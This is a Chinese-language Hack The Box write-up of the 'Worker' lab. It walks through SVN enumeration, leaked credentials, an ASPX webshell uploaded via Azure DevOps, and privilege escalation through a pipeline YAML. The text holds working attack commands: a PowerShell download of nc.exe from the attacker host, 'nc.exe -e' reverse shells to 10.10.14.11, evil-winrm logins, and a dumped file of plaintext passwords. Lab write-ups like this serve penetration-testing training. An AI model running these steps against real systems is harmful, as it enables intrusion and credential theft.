Worker-htb-writeup

0x00 靶场技能介绍

章节技能:3690端口SVN服务枚举、svn历史推送记录查询、敏感信息泄露查询、Azure DevOps 系统功能利用、主机挂载其他磁盘查询、Azure Repos Git 功能创建YAML配置文件获取反弹shell

参考链接:https://0xdf.gitlab.io/2021/01/30/htb-worker.html

0x01 用户权限获取

1、获取靶机IP地址:10.10.10.203

2、扫描开放端口情况

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 -oG allports 10.10.10.203
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 16:27 CST
Nmap scan report for 10.10.10.203
Host is up (0.49s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT     STATE SERVICE
80/tcp   open  http
3690/tcp open  svn
5985/tcp open  wsman

Nmap done: 1 IP address (1 host up) scanned in 15.67 seconds
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ grep -oP '([0-9]+)/open' allports | awk -F/ '{print $1}' | tr '\n' ','
80,3690,5985,                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -sV -sC -p80,3690,5985 -Pn --min-rate=10000 10.10.10.203
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-03-29 16:28 CST
Nmap scan report for 10.10.10.203
Host is up (0.59s latency).

PORT     STATE SERVICE  VERSION
80/tcp   open  http     Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
3690/tcp open  svnserve Subversion
5985/tcp open  http     Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 41.89 seconds

3、发现开放了3个端口,这里检索 3690 端口利用方式

https://book.hacktricks.xyz/v/cn/network-services-pentesting/3690-pentesting-subversion-svn-server

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ nc -vn 10.10.10.203 3690
(UNKNOWN) [10.10.10.203] 3690 (svn) open
( success ( 2 2 ( ) ( edit-pipeline svndiff1 accepts-svndiff2 absent-entries commit-revprops depth log-revprops atomic-revprops partial-replay inherited-props ephemeral-txnprops file-revs-reverse list ) ) )

4、到这里应该就是svn服务的相关操作了,参照上面的连接手册进行操作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
svn ls svn://10.10.10.203 #list
svn log svn://10.10.10.203 #Commit history
svn checkout svn://10.10.10.203 #Download the repository
svn up -r 2 #Go to revision 2 inside the checkout folder

┌──(kali㉿offsec)-[~/Desktop]
└─$ svn ls svn://10.10.10.203 #list
dimension.worker.htb/
moved.txt

┌──(kali㉿offsec)-[~/Desktop]
└─$ svn log svn://10.10.10.203 # Commit history
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 21:52:00 +0800 (六, 2020-06-20) | 1

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 21:50:20 +0800 (六, 2020-06-20) | 1

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 21:46:19 +0800 (六, 2020-06-20) | 1

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 21:45:16 +0800 (六, 2020-06-20) | 1

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 21:43:43 +0800 (六, 2020-06-20) | 1

First version
------------------------------------------------------------------------


┌──(kali㉿offsec)-[~/Desktop]
└─$ svn checkout svn://10.10.10.203 #Download the repository
A    dimension.worker.htb
A    dimension.worker.htb/LICENSE.txt
A    dimension.worker.htb/README.txt
A    dimension.worker.htb/assets
A    dimension.worker.htb/assets/css
A    dimension.worker.htb/assets/css/fontawesome-all.min.css
A    dimension.worker.htb/assets/css/main.css
A    dimension.worker.htb/assets/css/noscript.css
A    dimension.worker.htb/assets/js
A    dimension.worker.htb/assets/js/breakpoints.min.js
A    dimension.worker.htb/assets/js/browser.min.js
A    dimension.worker.htb/assets/js/jquery.min.js
A    dimension.worker.htb/assets/js/main.js
A    dimension.worker.htb/assets/js/util.js
A    dimension.worker.htb/assets/sass
A    dimension.worker.htb/assets/sass/base
A    dimension.worker.htb/assets/sass/base/_page.scss
A    dimension.worker.htb/assets/sass/base/_reset.scss
A    dimension.worker.htb/assets/sass/base/_typography.scss
A    dimension.worker.htb/assets/sass/components
A    dimension.worker.htb/assets/sass/components/_actions.scss
A    dimension.worker.htb/assets/sass/components/_box.scss
A    dimension.worker.htb/assets/sass/components/_button.scss
A    dimension.worker.htb/assets/sass/components/_form.scss
A    dimension.worker.htb/assets/sass/components/_icon.scss
A    dimension.worker.htb/assets/sass/components/_icons.scss
A    dimension.worker.htb/assets/sass/components/_image.scss
A    dimension.worker.htb/assets/sass/components/_list.scss
A    dimension.worker.htb/assets/sass/components/_table.scss
A    dimension.worker.htb/assets/sass/layout
A    dimension.worker.htb/assets/sass/layout/_bg.scss
A    dimension.worker.htb/assets/sass/layout/_footer.scss
A    dimension.worker.htb/assets/sass/layout/_header.scss
A    dimension.worker.htb/assets/sass/layout/_main.scss
A    dimension.worker.htb/assets/sass/layout/_wrapper.scss
A    dimension.worker.htb/assets/sass/libs
A    dimension.worker.htb/assets/sass/libs/_breakpoints.scss
A    dimension.worker.htb/assets/sass/libs/_functions.scss
A    dimension.worker.htb/assets/sass/libs/_mixins.scss
A    dimension.worker.htb/assets/sass/libs/_vars.scss
A    dimension.worker.htb/assets/sass/libs/_vendor.scss
A    dimension.worker.htb/assets/sass/main.scss
A    dimension.worker.htb/assets/sass/noscript.scss
A    dimension.worker.htb/assets/webfonts
A    dimension.worker.htb/assets/webfonts/fa-brands-400.eot
A    dimension.worker.htb/assets/webfonts/fa-brands-400.svg
A    dimension.worker.htb/assets/webfonts/fa-brands-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff
A    dimension.worker.htb/assets/webfonts/fa-brands-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-regular-400.eot
A    dimension.worker.htb/assets/webfonts/fa-regular-400.svg
A    dimension.worker.htb/assets/webfonts/fa-regular-400.ttf
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff
A    dimension.worker.htb/assets/webfonts/fa-regular-400.woff2
A    dimension.worker.htb/assets/webfonts/fa-solid-900.eot
A    dimension.worker.htb/assets/webfonts/fa-solid-900.svg
A    dimension.worker.htb/assets/webfonts/fa-solid-900.ttf
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff
A    dimension.worker.htb/assets/webfonts/fa-solid-900.woff2
A    dimension.worker.htb/images
A    dimension.worker.htb/images/bg.jpg
A    dimension.worker.htb/images/overlay.png
A    dimension.worker.htb/images/pic01.jpg
A    dimension.worker.htb/images/pic02.jpg
A    dimension.worker.htb/images/pic03.jpg
A    dimension.worker.htb/index.html
A    moved.txt
取出版本 5

5、根据上面发现的源码域名情况,绑定下本地的hosts文件

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 dimension.worker.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.203 dimension.worker.htb
                                                                                                       
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 worker.htb" | sudo tee -a /etc/hosts
10.10.10.203 worker.htb

6、查看上面通过svn发现的一些文件内容

1
2
3
4
5
6
7
8
9
10
11
┌──(kali㉿offsec)-[~/Desktop]
└─$ cat moved.txt              
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

此存储库已迁移,将不再在此维护。
您可以在以下位置找到最新版本:http://devops.worker.htb

//工人团队:)

7、继续绑定本地hosts文件

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 devops.worker.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.203 devops.worker.htb

8、查看发现的两个子域名的资产情况

http://dimension.worker.htb

http://devops.worker.htb/

9、还是没有什么大的发现,这里继续围绕svn进行操作开展,参照svn版本记录备注,查看 r2 内容。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
┌──(kali㉿offsec)-[~/Desktop]
└─$ svn up -r 2
正在升级 '.':
D    moved.txt
A    deploy.ps1
更新到版本 2

┌──(kali㉿offsec)-[~/Desktop]
└─$ cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")

10、到这里发现了一个泄露的账号密码信息,尝试使用这个账号密码去登录 devops.worker.htb 地址

http://devops.worker.htb/ekenas/

nathen
wendel98

11、成功登录页面,这个里面有很多的项目源码,尝试上传文件

12、可以发现无法再主支上面创建,创建分支,并上传了一个 test.txt 文件

13、分支是没有问题的,但是弄分支也没用啊~

14、经过摸索,发现页面上存在管道生成的功能点

15、我们在该源码文件创建分支并上传个 cmdasp.aspx 的木马文件

http://devops.worker.htb/ekenas/SmartHotel360/_git/dimension?path=%2F&version=GBmain&_a=contents

16、生成相关模版

http://devops.worker.htb/ekenas/SmartHotel360/_git/alpha?version=GBmain

17、本地添加该域名地址,并尝试访问我们的WEBSHELL地址

1
2
3
4
┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.10.203 alpha.worker.htb" | sudo tee -a /etc/hosts
[sudo] kali 的密码:
10.10.10.203 alpha.worker.htb

http://alpha.worker.htb/cmdasp.aspx

18、我们成功的上次到这个域名资产下的木马了,并且可以命令执行

19、我将启动本地 Python Web 服务器,然后nc.exe使用以下命令上传:powershell -c wget 10.10.14.24/nc64.exe -outfile \programdata\nc.exe

1
2
3
4
5
6
7
8
9
10
powershell -c wget 10.10.14.11/nc.exe -outfile \programdata\nc.exe

┌──(kali㉿offsec)-[~/Desktop/tools]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.203 - - [29/Mar/2024 17:47:43] "GET /nc.exe HTTP/1.1" 200 -

dir \programdata\

\programdata\nc.exe -e powershell 10.10.14.11 443

20、至此,我们成功的获取到第一个初始shell环境

1
2
3
4
5
6
7
8
9
10
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.203] 50315
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\windows\system32\inetsrv> whoami
whoami
iis apppool\defaultapppool

21、接下来开始信息枚举的过程

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
PS C:\Users> powershell -c get-psdrive -psprovider filesystem
powershell -c get-psdrive -psprovider filesystem

Name           Used (GB)     Free (GB) Provider      Root                                               CurrentLocation
----           ---------     --------- --------      ----                                               ---------------
C                  19,71          9,69 FileSystem    C:\                                                          Users
W                   2,52         17,48 FileSystem    W:\   
PS C:\Users> 

PS W:\svnrepos\www\conf> type passwd
type passwd
### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
PS W:\svnrepos\www\conf>

22、在新发现的磁盘中,发现了一堆账号密码,里面重点关注在当前主机上出现的账号密码

Administrator
restorer
robisl

robisl = wolves11

23、这里只发现这个账号信息,那就尝试一下吧,由于靶机开放的5985端口,也是winrm协议的服务,那就使用evil-winrm工具尝试下吧

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.203 -u robisl -p 'wolves11'   
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\robisl\Documents> whoami
worker\robisl

24、这里就获取到了第一个flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
*Evil-WinRM* PS C:\Users\robisl\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\robisl\Desktop> dir


    Directory: C:\Users\robisl\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        3/29/2024   9:26 AM             34 user.txt


*Evil-WinRM* PS C:\Users\robisl\Desktop> type user.txt
882d2a77d72658e18aa1b3e5ac8a59bc
*Evil-WinRM* PS C:\Users\robisl\Desktop>

0x02 系统权限获取

25、在接下来的主机枚举中并没有获取都什么有用的信息,这里尝试使用该账号密码去登录 devops.worker.htb 地址

26、这里发现了新的项目内容

27、经过摸索发现了一些信息

http://devops.worker.htb/ekenas/PartsUnlimited/_settings/security

PartsUnlimited > Build Administrators

28、该小组可以使用 CI和其他与管道相关的任务来定义构建。

29、接下来,我就不会了,就只能参考writeup了

在“管道”下,我将单击“新建管道”按钮,该按钮将启动一系列表单来创建管道。首先,我需要选择一个存储库:

我将选择 Azure Repos Git,然后从列表中选择 PartsUnlimited:

在下一步中,我将选择项目类型。有很多选择:

我选择了 Starter Pipeline,因为它看起来最简单。

下一个窗口显示一个 YAML 文件,该文件使用各种关键字定义管道:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
trigger:
- master

pool: 'Setup'

steps:
- script: |
    whoami
    type c:\users\administrator\desktop\root.txt
  displayName: 'Pwn all the things'


nt authority\system
06bd4ec57dc9cd8749cb04cd89763e4d

30、这里我们修改上面的代码来获取反弹shell

1
2
3
4
5
6
7
8
trigger:
- master

pool: 'Setup'

steps:
- script: c:\programdata\nc.exe -e cmd 10.10.14.11 443
  displayName: 'shellz'

http://devops.worker.htb/ekenas/PartsUnlimited/_build/results?buildId=169

1
2
3
4
5
6
7
8
┌──(kali㉿offsec)-[~/Desktop]
└─$ rlwrap nc -lnvp 443
listening on [any] 443 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.10.203] 49936

PS W:\agents\agent11\_work\8\s> cd C:/
PS C:\> whoami
nt authority\system

31、那么获取下最终的flag信息吧

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
PS C:\> cd Users/Administrator/Desktop
PS C:\Users\Administrator\Desktop> dir


    Directory: C:\Users\Administrator\Desktop


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
-ar---       2024-03-29     14:55             34 root.txt                                                              


PS C:\Users\Administrator\Desktop> cat root.txt
06bd4ec57dc9cd8749cb04cd89763e4d
PS C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/270

打靶记
#shooting-range
Worker-htb-writeup
https://sh1yan.top/2024/03/30/Worker-htb-writeup/
作者
shiyan
发布于
2024年3月30日
许可协议